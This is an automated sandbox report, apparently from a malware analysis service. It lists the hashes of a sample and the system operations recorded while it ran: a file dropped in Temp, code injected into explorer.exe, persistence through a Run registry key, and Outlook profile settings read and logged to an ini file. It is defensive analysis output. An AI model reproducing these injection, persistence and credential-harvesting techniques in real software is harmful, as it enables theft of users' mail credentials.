MD5:
9679973c4495843a13589d438c7f9677
SHA1: 4d2ee9b5ef7aa537db4ef414ae9854426f8ae578 SHA256: e3925df9b65909ca5128b30cd53f1c106cd1cf3b7d36a26be06091dbab712ad8 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, type = extended |
|
1 | |
| File | Read | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, offset = 0, size = 1288488 |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, type = extended |
|
1 | |
| Debug | Check for Presence | c:\windows\system32\cmmon32.exe |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Mutex | Create | mutex_name = 664908S9UTEIZ6MN, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Mutex | Create | mutex_name = OLO0NDS-0AXWwKzG, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Temp\lambdoidtegument.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, type = extended |
|
1 | |
| File | Read | filename = \??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, offset = 0, size = 237568 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, type = extended |
|
1 | |
| File | Create | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, type = extended |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\cmd.exe, os_pid = 0xc80, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 2418684 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1c0000 |
|
1 | |
| File | Create | filename = \??\C:\Windows\System32\drivers\etc\hosts, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\System32\drivers\etc\hosts, type = extended |
|
1 | |
| File | Create | filename = \??\C:\Windows\System32\drivers\etc\hosts, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Windows\System32\drivers\etc\hosts, type = extended |
|
1 | |
| File | Read | filename = \??\C:\Windows\System32\drivers\etc\hosts, offset = 0, size = 824 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Module | Create Mapping | protection = PAGE_READWRITE, maximum_size = 2417272 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_READWRITE, address_out = 0x1b00000 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductName |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Memory | Read | process_name = c:\windows\explorer.exe, address = 0x7ffde000, size = 32 |
|
1 | |
| System | Sleep | duration = 2417792 milliseconds (2417.792 seconds) |
|
1 | |
| Thread | Open | process_name = c:\windows\explorer.exe, os_tid = 0x614 |
|
1 | |
| Thread | Suspend | process_name = c:\windows\explorer.exe, os_tid = 0x614 |
|
1 | |
| Module | Map | process_name = c:\windows\explorer.exe, protection = PAGE_READWRITE, address_out = 0x6840000 |
|
1 | |
| Thread | Get Context | process_name = c:\windows\explorer.exe, os_tid = 0x614 |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 2417760 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x24d0000 |
|
1 | |
| Module | Map | process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x63a0000 |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\cmmon32.exe |
|
1 | |
| Thread | Set Context | process_name = c:\windows\explorer.exe, os_tid = 0x614 |
|
1 | |
| Thread | Queue APC | process_name = c:\windows\explorer.exe, os_tid = 0x614 |
|
1 | |
| Thread | Resume | process_name = c:\windows\explorer.exe, os_tid = 0x614 |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = VFIL_RNHERNX, data = C:\Program Files\Crfitq6x\gdigzvh.exe, size = 74, type = REG_SZ |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-, desired_access = FILE_READ_DATA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-, type = extended |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlog.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 0, size = 40 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0413e2ad850e7146953cbb4c2672287e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0413e2ad850e7146953cbb4c2672287e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1b5aad0cdb629e49a2c6203d4a6a948a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1b5aad0cdb629e49a2c6203d4a6a948a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1dab3177c2ac33448a4fe54b862a329e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1dab3177c2ac33448a4fe54b862a329e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\2a7b899b94a04042a46a1cd96dc2a18c |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\2a7b899b94a04042a46a1cd96dc2a18c |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7a302ee0804dab4ba930ea4351b9b4ac |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7a302ee0804dab4ba930ea4351b9b4ac |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7df1ae4ad074c146bb02f647b97dd78e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7df1ae4ad074c146bb02f647b97dd78e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 40, size = 12 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 52, size = 82 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 134, size = 18 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 152, size = 24 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 176, size = 24 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 200, size = 20 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 220, size = 26 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 246, size = 18 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 264, size = 28 |
|
1 | |
